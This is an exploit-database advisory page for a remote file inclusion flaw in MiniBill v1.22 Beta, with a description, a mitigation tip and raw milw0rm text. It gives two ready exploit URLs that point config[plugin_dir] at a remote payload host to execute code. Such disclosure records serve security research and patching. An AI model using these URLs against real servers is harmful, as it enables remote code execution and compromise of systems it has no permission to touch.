header-logo
Suggest Exploit
vendor:
MiniBill
by:
the master
9,3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: MiniBill
Affected Version From: 1.22 Beta
Affected Version To: 1.22 Beta
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

MiniBill v1.22 Beta Remote File Inclusion Vulnerability

MiniBill v1.22 Beta is vulnerable to a Remote File Inclusion vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. This request contains a malicious URL in the config[plugin_dir] parameter, which is then included in the vulnerable script. This allows an attacker to execute arbitrary code on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in any dynamic content generation.
Source

Exploit-DB raw data:

########################################################################
#  MiniBill v1.22 Beta  Remote File Inclusion Vulnerability
#
#  Download: http://www.ultrize.com/minibill/download/minibill-20060714.zip
#
#  Found By: the master
#
########################################################################
#  exploit:
#
#
http://[Target]/[Path]/actions/ipn.php?config[plugin_dir]=http://cmd.gif?
#
http://[Target]/[Path]/include/initPlugins.php?config[plugin_dir]=http://cmd.gif?
########################################################################

# milw0rm.com [2006-08-29]

Navigation

Suggest Exploit

Services By CQR